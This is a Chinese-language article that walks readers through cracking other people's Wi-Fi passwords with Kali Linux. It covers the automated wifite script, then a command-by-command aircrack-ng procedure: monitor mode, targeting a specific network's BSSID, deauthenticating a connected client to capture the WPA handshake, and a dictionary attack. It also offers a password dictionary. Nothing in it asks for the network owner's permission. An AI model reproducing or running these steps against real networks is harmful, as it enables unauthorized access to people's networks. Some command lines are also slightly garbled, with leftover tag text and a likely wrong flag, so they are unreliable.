本文目录一览:
- 1、kali linux 怎么破解无线网络密码
- 2、怎么用kali linux破wifi
- 3、用kali linux抓取wifi握手包并暴力破解
- 4、Kali系统使用Aircrack-ng进行暴力破解WIFI密码
kali linux 怎么破解无线网络密码
首先,虚拟机内是无法使用内置无线网卡的,如果在虚拟机上用kali破解wifi,是需要usb无线网卡的。
在kali里面破解无线网:在终端输入命令wifite,它会打开网卡的监听模式并扫描附近的无线网显示出来,显示一会儿后按下键盘上的ctrl+c组合键,它会让你选择破解的目标网络,这时输入序号(数字),它就会自动进行破解工作,破解完成有提示。
原理:wifite命令是无线渗透测试的自动化脚本,它实际上是个python脚本,用于自动化调用kali上面的各种工具,像是reaver、aircrack-ng等。它先尝试pin码破解,无法用pin码破解时,会尝试抓取握手包,用字典进行握手包的暴力破解。pin码破解的时间比较短,握手包的暴力破解可能会用gpu加速,取决于主机的性能和密码的复杂程度,虚拟机对握手包暴力破解很无力(性能局限),就指望pin码破解了。
怎么用kali linux破wifi
首先在台式机上一定要有一个无线网卡,可以是插在主板上的无线网卡,也可以是USB接口的外置无线网卡,但是最好是Kali Linux支持的型号,不然驱动程序的问题很麻烦,X宝上有的卖。
再说Kali,Kali Linux上破解WIFI的工具非常全面,因为Kali有无线渗透测试的功能,但是系统性的学习还是挺麻烦的,一条条的调用命令破解步骤也比较繁琐,非专业渗透测试人员推荐用一个Kali上面用于无线渗透测试的傻瓜型自动化脚本,那就是wifite。
wifite命令是用于无线渗透测试的自动化测试脚本,它是个python脚本,用于自动化调用kali上面的各种无线测试工具,像是reaver、aircrack-ng等。它会先尝试PIN码破解wifi,当无法用PIN码破解时,会尝试抓取wifi验证握手包,然后用Kali上的字典进行握手包的暴力破解。PIN码破解的时间一般比较短,握手包的暴力破解会用GPU来加速,破解的速度取决于主机的性能配置(还有密码的复杂程度)。
wifite的使用方法:直接在终端输入命令wifite,它会调用aircrack-ng打开网卡的监听模式并扫描附近的无线网络并一一显示出来,等它显示一会儿后按下键盘上的Ctrl+C组合键,它会中断对无线网的扫描并让你选择破解的目标网络,这时输入要破解的网络的序号(注意是序号,是个数字)并按下回车,它就会自动进行破解工作,破解过程可能很长,也可能会失败,等到破解完成会有相应的提示。
用kali linux抓取wifi握手包并暴力破解
kali linux前身是BT5系统,作为渗透测试人员的标配装备,在这就不过多介绍了,接下来我们要使用kali linux完成抓取握手包,破解密码整个过程。
主要使用Aircrack套装软件
附:
Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)
Kali系统使用Aircrack-ng进行暴力破解WIFI密码
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
使用Kali 2021.3进行演示操作
软件: aircrack-ng (Kali系统内置)
外置无线网卡设备: 要支持监听,支持Linux并且免驱(我这里使用的是RT3070)
命令: codesudo su/code
解释: 不在管理员模式下运行可能会有权限不够的提示
命令: codeiwconfig/ifconfig/code
解释: iwconfig查看网卡的信息、ifconfig查看新连接的设备
wlan0就是我们的无线网卡
命令: codeairmon-ng check kill/code
解释: 杀死进程可以让搜索更准确,不会受到影响
命令: codeairmon-ng/code
出现你的网卡信息就说明你的网卡支持监听
命令: codeairmon-ng start wlan0/code
解释: start 开启哪个接口 wlan0 是接口的名字
再用iwconfig查看一下网卡信息,wlan0后面多了个mon,wlan0mon就说明已经开启监听了
命令: codeairodump-ng wlan0mon/code
解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称
命令: codeairodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon/code
解释:
我要破解的目标网络是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹
输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包
命令: codeaireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon/code
解释:
执行命令codeaireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon/code
捕捉到握手包时就停止攻击
命令: codeaircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap/code
解释:
最后就是等待跑字典了,下面就是破解的WIFI密码
命令: codeairmon-ng stop wlan0mon/code
在监听模式下,kali不能连接网络
插入网卡,如果查看不到网卡信息,可以点开连接WIFI看一下能否搜索到附近的网络,如果不行那就右键系统可移动设备-把网卡断开再重新连接一下
插入网卡,打开网卡的监听模式,搜索附近的WIFI,获取握手包,最后跑字典破解握手包,这里给大家提供一个常用的密码字典